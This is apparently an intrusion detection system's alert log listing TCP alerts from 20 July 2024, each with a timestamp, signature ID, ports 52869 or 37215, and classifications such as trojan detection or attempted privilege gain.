                      Timestamp:07/20/24-23:02:17.085116
                      SID:2025132
                      Source Port:48072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2027339
                      Source Port:53756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.624022
                      SID:2027339
                      Source Port:37678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2025132
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.246802
                      SID:2831300
                      Source Port:50224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.508271
                      SID:2025132
                      Source Port:49518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.995803
                      SID:2027339
                      Source Port:54222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:47064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:37540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.450410
                      SID:2027339
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.944701
                      SID:2025132
                      Source Port:42188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.354321
                      SID:2027339
                      Source Port:36176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.478924
                      SID:2025132
                      Source Port:56258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2027339
                      Source Port:53430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.765841
                      SID:2025132
                      Source Port:34016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.508271
                      SID:2025132
                      Source Port:60680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2027339
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2829579
                      Source Port:50026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.960642
                      SID:2829579
                      Source Port:40560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.000556
                      SID:2025132
                      Source Port:38772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2025132
                      Source Port:58940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.652628
                      SID:2025132
                      Source Port:35362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2027339
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:46116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.275811
                      SID:2027339
                      Source Port:37202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.293628
                      SID:2025132
                      Source Port:35646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2027339
                      Source Port:37226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201033
                      SID:2829579
                      Source Port:56980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.353334
                      SID:2027339
                      Source Port:39012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2831300
                      Source Port:34440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.560666
                      SID:2025132
                      Source Port:41116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.289412
                      SID:2831300
                      Source Port:59166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2835222
                      Source Port:33388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.307063
                      SID:2027339
                      Source Port:49106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.130152
                      SID:2027339
                      Source Port:59250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:38428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:45534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:60616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.660917
                      SID:2027339
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2025132
                      Source Port:39516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.884162
                      SID:2831300
                      Source Port:41536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.224525
                      SID:2027339
                      Source Port:45980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:59408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.686830
                      SID:2027339
                      Source Port:56344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.543362
                      SID:2027339
                      Source Port:51336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.577149
                      SID:2027339
                      Source Port:44372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.321505
                      SID:2027339
                      Source Port:44928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.328797
                      SID:2831300
                      Source Port:53538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2835222
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157620
                      SID:2835222
                      Source Port:59522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.073087
                      SID:2835222
                      Source Port:56496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.260372
                      SID:2027339
                      Source Port:55702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.388926
                      SID:2027339
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.735576
                      SID:2027339
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2835222
                      Source Port:55928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.604911
                      SID:2027339
                      Source Port:45406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:54302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.279073
                      SID:2025132
                      Source Port:57644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2831300
                      Source Port:56772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.069870
                      SID:2027339
                      Source Port:58724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.250832
                      SID:2027339
                      Source Port:33106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.525064
                      SID:2025132
                      Source Port:38604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.820007
                      SID:2027339
                      Source Port:37114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.987185
                      SID:2831300
                      Source Port:50506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.674251
                      SID:2831300
                      Source Port:53446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2027339
                      Source Port:33416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.219427
                      SID:2025132
                      Source Port:34934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.043863
                      SID:2835222
                      Source Port:36224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.324295
                      SID:2025132
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.719613
                      SID:2025132
                      Source Port:45138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:46500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2831300
                      Source Port:50420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.426918
                      SID:2027339
                      Source Port:36142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966087
                      SID:2027339
                      Source Port:42896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2835222
                      Source Port:42378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.090121
                      SID:2025132
                      Source Port:45414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.321431
                      SID:2027339
                      Source Port:41312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2027339
                      Source Port:43018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.484813
                      SID:2831300
                      Source Port:41322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.109699
                      SID:2027339
                      Source Port:52936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.212590
                      SID:2831300
                      Source Port:36886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2829579
                      Source Port:39794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.751196
                      SID:2027339
                      Source Port:49298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.364263
                      SID:2027339
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.574617
                      SID:2831300
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.874055
                      SID:2025132
                      Source Port:33176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.322736
                      SID:2027339
                      Source Port:55204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.839255
                      SID:2027339
                      Source Port:37964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:59284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.546480
                      SID:2027339
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:51264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.662969
                      SID:2835222
                      Source Port:48664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.272788
                      SID:2027339
                      Source Port:37376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.728248
                      SID:2831300
                      Source Port:37248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.760231
                      SID:2025132
                      Source Port:52620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.745095
                      SID:2025132
                      Source Port:49278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2027339
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221564
                      SID:2829579
                      Source Port:33418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.969418
                      SID:2025132
                      Source Port:38164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:37766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2835222
                      Source Port:40818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.322736
                      SID:2831300
                      Source Port:37216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:57488
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591397
                      SID:2831300
                      Source Port:44614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.305660
                      SID:2831300
                      Source Port:59386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.631467
                      SID:2027339
                      Source Port:50728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2829579
                      Source Port:52462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2835222
                      Source Port:59582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.581974
                      SID:2027339
                      Source Port:59630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2025132
                      Source Port:41740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.413537
                      SID:2025132
                      Source Port:57454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.615381
                      SID:2831300
                      Source Port:50648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.742666
                      SID:2025132
                      Source Port:60858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.335096
                      SID:2027339
                      Source Port:52352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:36920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.287821
                      SID:2027339
                      Source Port:59420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.918137
                      SID:2027339
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2831300
                      Source Port:42412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.252602
                      SID:2025132
                      Source Port:35072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.313122
                      SID:2027339
                      Source Port:48484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2027339
                      Source Port:46390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.993925
                      SID:2027339
                      Source Port:59994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.246801
                      SID:2027339
                      Source Port:37326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2027339
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2025132
                      Source Port:57316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.811941
                      SID:2027339
                      Source Port:52716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.055714
                      SID:2829579
                      Source Port:56810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.423677
                      SID:2025132
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.281138
                      SID:2027339
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.707648
                      SID:2025132
                      Source Port:47876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:40708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.608031
                      SID:2027339
                      Source Port:43532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.536855
                      SID:2831300
                      Source Port:60226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2829579
                      Source Port:33436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.437937
                      SID:2027339
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600680
                      SID:2831300
                      Source Port:60816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:47118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2829579
                      Source Port:43800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286262
                      SID:2025132
                      Source Port:34938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:52380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:27.457367
                      SID:2027339
                      Source Port:59562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:34126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.093693
                      SID:2027339
                      Source Port:56640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2027339
                      Source Port:50068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:59782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.899168
                      SID:2831300
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.603921
                      SID:2025132
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.749865
                      SID:2027339
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.035425
                      SID:2027339
                      Source Port:52626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.629615
                      SID:2831300
                      Source Port:59098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2835222
                      Source Port:49434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2831300
                      Source Port:33358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.405280
                      SID:2831300
                      Source Port:51008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.165240
                      SID:2831300
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2835222
                      Source Port:57074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.934101
                      SID:2831300
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.917774
                      SID:2027339
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.387026
                      SID:2831300
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.090582
                      SID:2027339
                      Source Port:45838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2829579
                      Source Port:57662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2027339
                      Source Port:58228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.560945
                      SID:2027339
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.834603
                      SID:2027339
                      Source Port:50948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.602822
                      SID:2027339
                      Source Port:33086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.689098
                      SID:2025132
                      Source Port:54750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.320661
                      SID:2025132
                      Source Port:53926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2831300
                      Source Port:50844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.472422
                      SID:2025132
                      Source Port:51862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2835222
                      Source Port:35134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.246583
                      SID:2027339
                      Source Port:44988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.295391
                      SID:2831300
                      Source Port:48558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2831300
                      Source Port:49086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:05.547419
                      SID:2027339
                      Source Port:39674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.779973
                      SID:2025132
                      Source Port:54124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.317366
                      SID:2027339
                      Source Port:51816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.252201
                      SID:2027339
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312611
                      SID:2831300
                      Source Port:49188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2835222
                      Source Port:41740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:36896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
